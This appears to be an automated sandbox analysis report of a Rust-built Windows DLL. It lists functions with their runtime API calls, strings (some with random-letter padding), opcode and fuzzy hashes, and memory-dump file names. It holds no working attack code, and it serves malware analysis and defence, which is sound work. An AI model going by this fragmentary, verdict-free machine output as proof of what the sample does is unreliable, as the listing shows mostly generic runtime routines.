String ID: Box<dyn Any><unnamed>thread '' panicked at '', $cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa
API String ID: 942675266-716947571
Opcode ID: b28ee44d05aef9b3c8a812dfb4b2ee197767f3e46a7f33fb147f6065af2736f3
Instruction ID: 364c3b990f4c3203740dc521a491d1b06ec9184bb0114412a9ac3bffec9f411d
Opcode Fuzzy Hash: b28ee44d05aef9b3c8a812dfb4b2ee197767f3e46a7f33fb147f6065af2736f3
Instruction Fuzzy Hash: F30256B0E002199FDB10CFE4C994B9EBBF5BF49304F208659D415AF280D775A986CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F6F6, Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMON

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6EA9F7F3
type_info::operator==.LIBVCRUNTIME ref: 6EA9F815
___TypeMatch.LIBVCRUNTIME ref: 6EA9F924
IsInExceptionSpec.LIBVCRUNTIME ref: 6EA9F9F6
_UnwindNestedFrames.LIBCMT ref: 6EA9FA7A
CallUnexpected.LIBVCRUNTIME ref: 6EA9FA95

Strings

csm, xrefs: 6EA9F733
csm, xrefs: 6EA9F84C
csm, xrefs: 6EA9F7A0

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: f3249ff0ba866166b7cdd226113bc0d67df8684557c2d707efa8b6525383de19
Instruction ID: 794c15628f9888e4671e5ca87cee3ef2edf3fb2cb84a78f183ecdb8425684a77
Opcode Fuzzy Hash: f3249ff0ba866166b7cdd226113bc0d67df8684557c2d707efa8b6525383de19
Instruction Fuzzy Hash: 16B18A7982020AEFCF44CFE5C9809AEB7F9BF04314B28455EF8106B215D734DA91EB99

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C340, Relevance: 12.6, APIs: 10, Instructions: 125COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 6EA8C37A
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C387
TlsGetValue.KERNEL32(?), ref: 6EA8C3CA
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C3D7
TlsGetValue.KERNEL32(?), ref: 6EA8C40A
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C417
TlsGetValue.KERNEL32(?), ref: 6EA8C44A
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C457
TlsGetValue.KERNEL32(?), ref: 6EA8C48B
TlsSetValue.KERNEL32(?,00000000), ref: 6EA8C498

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 4a5ec8738aaf4831b10f7eb8dd41713b78ab8ba6797181c32c67b3585abf6e79
Instruction ID: bb8e4dc67f051b6cc2eecdde665e1ac3ad6843c711b219b1d7414d995b0d643a
Opcode Fuzzy Hash: 4a5ec8738aaf4831b10f7eb8dd41713b78ab8ba6797181c32c67b3585abf6e79
Instruction Fuzzy Hash: BB418131244349AFEB516EE49C19FAB3754EF22740F089220FE245D111E762DED29F9B

Uniqueness

Uniqueness Score: -1.00%

Function 6EA91BF0, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 212fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F4,?,?,?,?,?,?,?,?,?,6EA91A7E,?), ref: 6EA91C05
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6EA91A7E,?), ref: 6EA91C16
GetConsoleMode.KERNEL32(00000000,?), ref: 6EA91C58
WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 6EA91CD3
GetLastError.KERNEL32(?,?,?,00000000), ref: 6EA91D55

Strings

assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb, xrefs: 6EA91E5E
Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx, xrefs: 6EA91E45

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$ConsoleFileHandleModeWrite
String ID: Unexpected number of bytes for incomplete UTF-8 codepoint.C:hblnvdkuwjldwqihlnxtdgmpotoebajfmrqgmtnnutixvbqajdevcxgcqgdhsiilwcvdkgzorjjpjapcqyybtuxulzftbxrvddihohqaoiyqfmhasplljpbebhbcelwx$assertion failed: !handle.is_null()C:dhidzhitbujbfqqncawhogkkniegcctcaffidkzeqdjseyaidkczyyqaglapgqobugufdomajsuqnpsbinwfvrqqdagbgthjkpsvdrffbyloxsjdadyxwklhzxnssljgptb
API String ID: 4172320683-1866377508
Opcode ID: 0e3a2f0728063f1279d062cd792d0343d76788ad021e2363af690ff2de3157e3
Instruction ID: 1929ec23e3279e0261045a500d173ab299cfd345ef140e1ffd5750efd4a1a9bb
Opcode Fuzzy Hash: 0e3a2f0728063f1279d062cd792d0343d76788ad021e2363af690ff2de3157e3
Instruction Fuzzy Hash: 9171E2706183058FD7108FA9D49077B7BE9ABA6308F15882DE4DA8B380E735D8CDD71A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C4D0, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6EADE108), ref: 6EA8C509
ReleaseSRWLockExclusive.KERNEL32(6EADE108), ref: 6EA8C553
GetProcessHeap.KERNEL32 ref: 6EA8C562
HeapAlloc.KERNEL32(00B70000,00000000,00000020), ref: 6EA8C575
ReleaseSRWLockExclusive.KERNEL32(6EADE108), ref: 6EA8C5C7

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6EA8C5F7
failed to generate unique thread ID: bitspace exhausted, xrefs: 6EA8C5D4

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ExclusiveLock$HeapRelease$AcquireAllocProcess
String ID: called `Option::unwrap()` on a `None` value$failed to generate unique thread ID: bitspace exhausted
API String ID: 1780889587-1657987152
Opcode ID: 246633844eb38b9a31a3890a367feb9a804cf3456ef2b8be1151b2059ee2ac6b
Instruction ID: 8dcdd8420a566dd6490574176da4fad63ed5b3d05ed0873dbe38fbad6bde14ab
Opcode Fuzzy Hash: 246633844eb38b9a31a3890a367feb9a804cf3456ef2b8be1151b2059ee2ac6b
Instruction Fuzzy Hash: 7D31CDB0E003048BEB048FD8D91879EBBB4FB88324F148229D4156F380D7359989CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA810A0, Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 141memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 6EA810D6
HeapAlloc.KERNEL32(00B70000,00000000,0000000F), ref: 6EA810ED
GetProcessHeap.KERNEL32(00B70000,00000000,0000000F), ref: 6EA8111F
HeapAlloc.KERNEL32(00B70000,00000000,00000010,00B70000,00000000,0000000F), ref: 6EA81136
HeapFree.KERNEL32(00000000,?,00000000,00000010,00B70000,00000000,0000000F), ref: 6EA8120B
HeapFree.KERNEL32(00000000,?,00000000,00000010,00B70000,00000000,0000000F), ref: 6EA8121B

Strings

Control_RunDLL, xrefs: 6EA81102
Control_RunDLL, xrefs: 6EA8114B

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocFreeProcess
String ID: Control_RunDLL$Control_RunDLL
API String ID: 2113670309-2490747307
Opcode ID: 08a2fb121053f1ecc40317549d7bc88e86d1f26f06ffe0b7e8146a5c76d51172
Instruction ID: 72fe35517294f1f54e64564e71b980ef5e8565c3385234994d70defc67fdeb78
Opcode Fuzzy Hash: 08a2fb121053f1ecc40317549d7bc88e86d1f26f06ffe0b7e8146a5c76d51172
Instruction Fuzzy Hash: CC519C75E007099BDB00CFE8CD40BEEB7B9FB99704F148529E8157B241E775A885CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9EF20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 6EA9EF57
___except_validate_context_record.LIBVCRUNTIME ref: 6EA9EF5F
_ValidateLocalCookies.LIBCMT ref: 6EA9EFE8
__IsNonwritableInCurrentImage.LIBCMT ref: 6EA9F013
_ValidateLocalCookies.LIBCMT ref: 6EA9F068

Strings

csm, xrefs: 6EA9EFFD

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 73fe88f51fb2c00416c2a873e614a570edc4f8b4a920feb23b7b9270b9077ff9
Instruction ID: 616f9f5e603c2a9aa4880c44a80c882a0f21c72d1379554d7087ff51825c1b48
Opcode Fuzzy Hash: 73fe88f51fb2c00416c2a873e614a570edc4f8b4a920feb23b7b9270b9077ff9
Instruction Fuzzy Hash: FE419534A20219EFCF00CFACC880A9EBBF9BF45328F14C55AE9149B352D7319995CB95

Uniqueness

Uniqueness Score: -1.00%

Function 6EA92960, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6EADE114), ref: 6EA92994
TlsAlloc.KERNEL32 ref: 6EA929AA
GetProcessHeap.KERNEL32 ref: 6EA929C4
HeapAlloc.KERNEL32(00B70000,00000000,0000000C), ref: 6EA929DB
ReleaseSRWLockExclusive.KERNEL32(6EADE114), ref: 6EA92A18

Strings

assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx, xrefs: 6EA92A38

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocExclusiveHeapLock$AcquireProcessRelease
String ID: assertion failed: key != c::TLS_OUT_OF_INDEXESC:nzjojbotqasycnkljdteylasxmjqphnrtuuxvfwvaplwzgzyritzjhhjbshfvmfwyjcjnfnfvmrvjottrwutfjgifoertqrccfhqlnovkbhlvalwmitqmxbhveuriecxxgeiiftdxvx
API String ID: 3228198226-3009553730
Opcode ID: 3be2a5b88d2db881433e624f7beae2a1a03bd5ad7a4b2dd9a962b3454fc25349
Instruction ID: 39662a4ae29564760728e3c6b7c3d3a37857702be76468acb0300fa66d9b351d
Opcode Fuzzy Hash: 3be2a5b88d2db881433e624f7beae2a1a03bd5ad7a4b2dd9a962b3454fc25349
Instruction Fuzzy Hash: 604148B19003098FDB10CFD4D945B9EBBF5FB45318F144129E519AB280EB759889CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA42BC, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,6EAA43C9,FFFDC801,00000400,?,00000000,00000001,?,6EAA4542,00000021,FlsSetValue,6EAD6BF8,6EAD6C00,?), ref: 6EAA437D

Strings

ext-ms-, xrefs: 6EAA4327
api-ms-, xrefs: 6EAA4313

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 4939a08324356b1031348104d6e1c19a980e651ed0e9fcd5aaae04d1866296ba
Instruction ID: 4bca6baf93bd27b7e4fdcf47df6efff1eac70d51fb8f8ab41ca552f04cfacaff
Opcode Fuzzy Hash: 4939a08324356b1031348104d6e1c19a980e651ed0e9fcd5aaae04d1866296ba
Instruction Fuzzy Hash: 21212B35940712ABDB219AADCC44A5E7768EB43360F164154FE25BB280DF30ED47C6F8

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9F3BF, Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,6EA9F101,6EA9CFA2,6EA9C7AC,?,6EA9C9E4,?,00000001,?,?,00000001,?,6EADAFA8,0000000C,6EA9CADD), ref: 6EA9F3CD
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6EA9F3DB
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6EA9F3F4
SetLastError.KERNEL32(00000000,6EA9C9E4,?,00000001,?,?,00000001,?,6EADAFA8,0000000C,6EA9CADD,?,00000001,?), ref: 6EA9F446

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: ed11e0431ae9a7b55614d2903f3490de827a5b29a9665a7e8039d34c3f0f2487
Instruction ID: fee08105661e597c7e0b46ec5ec51367d69b08245786e621a1f41536af8a284f
Opcode Fuzzy Hash: ed11e0431ae9a7b55614d2903f3490de827a5b29a9665a7e8039d34c3f0f2487
Instruction Fuzzy Hash: 1801F936168B125DEA613AF85D8466B3EE8EB46274730832DF920651D0FF114C92AA48

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9BE60, Relevance: 9.0, APIs: 6, Instructions: 50COMMON

Download Yara Rule

APIs

Part of subcall function 6EA9C510: GetTickCount64.KERNEL32 ref: 6EA9C517

GetTickCount64.KERNEL32 ref: 6EA9BE96
GetTickCount64.KERNEL32 ref: 6EA9BEB4
GetTickCount64.KERNEL32 ref: 6EA9BECD
GetTickCount64.KERNEL32 ref: 6EA9BECF
GetTickCount64.KERNEL32 ref: 6EA9BED6
GetTickCount64.KERNEL32 ref: 6EA9BEF4

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Count64Tick
String ID:
API String ID: 1927824332-0
Opcode ID: dba2ff9360f87b1edf8369a11c87ca8840a9c0efa795440764ddbd28e5113fb6
Instruction ID: 870c1a0b35fb53cf576232bc4ec8f793c1a417d5e6caba55112a33d972239fad
Opcode Fuzzy Hash: dba2ff9360f87b1edf8369a11c87ca8840a9c0efa795440764ddbd28e5113fb6
Instruction Fuzzy Hash: 58014012C34E28DDD203AA7A984154AA6AD9F973E0B19C793D0467A006FF9054E39695

Uniqueness

Uniqueness Score: -1.00%

Function 6EA86B40, Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 6EA86C1B
__aulldiv.LIBCMT ref: 6EA86C2B

Strings

'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern ", xrefs: 6EA86B54
_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool, xrefs: 6EA86BAA, 6EA86BE5
{invalid syntax}, xrefs: 6EA86B84

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: __aulldiv__aullrem
String ID: 'for<, > as ::{shimclosure#[]dyn + ; mut const unsafe extern "$_!f64f32usizeu128u64u32u16u8isizei128i64i32i16i8strcharbool${invalid syntax}
API String ID: 3839614884-2364648981
Opcode ID: 84076f8a0328085db6b7a2a9c25cdcaebecdb7ff6e60b0671a412ef39e7ee387
Instruction ID: 1d077883221a74af23a89266445cd35c4c3642307ce99a726e8ff98098688d72
Opcode Fuzzy Hash: 84076f8a0328085db6b7a2a9c25cdcaebecdb7ff6e60b0671a412ef39e7ee387
Instruction Fuzzy Hash: 5F4176747682104BE3149AA8D845B3BBBD5DFD4708F24483DE889CF3D2E665CCD183AA

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8D000, Relevance: 8.8, APIs: 7, Instructions: 85memoryCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000001,6EA8C746), ref: 6EA8D00B
TlsGetValue.KERNEL32(00000000,00000001,6EA8C746), ref: 6EA8D023
TlsGetValue.KERNEL32(00000000), ref: 6EA8D043
TlsGetValue.KERNEL32(00000000), ref: 6EA8D063
GetProcessHeap.KERNEL32 ref: 6EA8D076
HeapAlloc.KERNEL32(00B70000,00000000,0000000C), ref: 6EA8D089
TlsSetValue.KERNEL32(00000000,00000000,00B70000,00000000,0000000C), ref: 6EA8D0B6

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Value$Heap$AllocProcess
String ID:
API String ID: 3559649508-0
Opcode ID: 2e55276b64754fdd30870e08e8d029792b8f7432a3d12ac94972098ddfab8adf
Instruction ID: 3b1b218bb0608988749d4fe0d44eb34c8fc661a674b64a29d6411e99f7ce68f5
Opcode Fuzzy Hash: 2e55276b64754fdd30870e08e8d029792b8f7432a3d12ac94972098ddfab8adf
Instruction Fuzzy Hash: C311AE706007028AEB104BF58854B577AEDAB82244F074D26D906EF240D725DCC7DE6D

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA3571, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON

Download Yara Rule

Strings

C:\Windows\SYSTEM32\loaddll32.exe, xrefs: 6EAA358D

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: C:\Windows\SYSTEM32\loaddll32.exe
API String ID: 0-1872383224
Opcode ID: 71667911776de8cbaedf53cc49fc35a58ce45dfaf6e7e8723be775f95cdd1192
Instruction ID: 95cd8fb41e359c92cdd925e39c55538e8141e3e5d64be4d50ef8dc75e3e85d6e
Opcode Fuzzy Hash: 71667911776de8cbaedf53cc49fc35a58ce45dfaf6e7e8723be775f95cdd1192
Instruction Fuzzy Hash: E121C5716043067FC700AFEDC94889FB7EDEF053587158955F6549B210DB30EC888B68

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA0422, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,6EAA04E3,00000000,?,00000001,00000000,?,6EAA055A,00000001,FlsFree,6EAD6184,FlsFree,00000000), ref: 6EAA04B2

Strings

api-ms-, xrefs: 6EAA0472

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: bb4f99a2dc1ea3d41ef819f155846787088b081b2ac46910c4c8fa9a24c1e140
Instruction ID: cba9e8abc870253956df36dc34a3df41615a963eb5eb5df4a20f56da2f75f038
Opcode Fuzzy Hash: bb4f99a2dc1ea3d41ef819f155846787088b081b2ac46910c4c8fa9a24c1e140
Instruction Fuzzy Hash: 4D11CA35A40725AFDB528AAC8C8474D37A4BF027B0F258125FA55FB280E730ED8186D9

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA12ED, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,26B76B9F,00000000,?,00000000,6EAA9B33,000000FF,?,6EAA127D,?,?,6EAA1251,?), ref: 6EAA1322
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6EAA1334
FreeLibrary.KERNEL32(00000000,?,00000000,6EAA9B33,000000FF,?,6EAA127D,?,?,6EAA1251,?), ref: 6EAA1356

Strings

CorExitProcess, xrefs: 6EAA132C
mscoree.dll, xrefs: 6EAA131B

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 840713917f11ee171440ef2801f04710896f7c41448464d765c6b288be6cefdb
Instruction ID: e29e60b12b54a6e1d806ad476887edf917ece5aca41e359d2af02e43f3e53692
Opcode Fuzzy Hash: 840713917f11ee171440ef2801f04710896f7c41448464d765c6b288be6cefdb
Instruction Fuzzy Hash: 7F018471900B56EFDB028F98CD04FBE7BF9FB44611F044525E911A6680DB759944CA54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C280, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32), ref: 6EA8C285
GetProcAddress.KERNEL32(00000000,SetThreadDescription), ref: 6EA8C295

Strings

kernel32, xrefs: 6EA8C280
SetThreadDescription, xrefs: 6EA8C28F

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: SetThreadDescription$kernel32
API String ID: 1646373207-1950310818
Opcode ID: b466ca1c16270a6aeefbc780a34b751a8cebd46bc3194cef4d6cef4ec874fdb5
Instruction ID: bc57fee72f2b3242614b7ca03514efe4293e82c952846c67e71c04b3b00f2a7c
Opcode Fuzzy Hash: b466ca1c16270a6aeefbc780a34b751a8cebd46bc3194cef4d6cef4ec874fdb5
Instruction Fuzzy Hash: C7B09B705407035EDD506EF5494CA5E3D5675C120130148806015ED141E9948085A979

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C2E0, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 9libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll), ref: 6EA8C2E5
GetProcAddress.KERNEL32(00000000,NtReleaseKeyedEvent), ref: 6EA8C2F5

Strings

NtReleaseKeyedEvent, xrefs: 6EA8C2EF
ntdll, xrefs: 6EA8C2E0

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
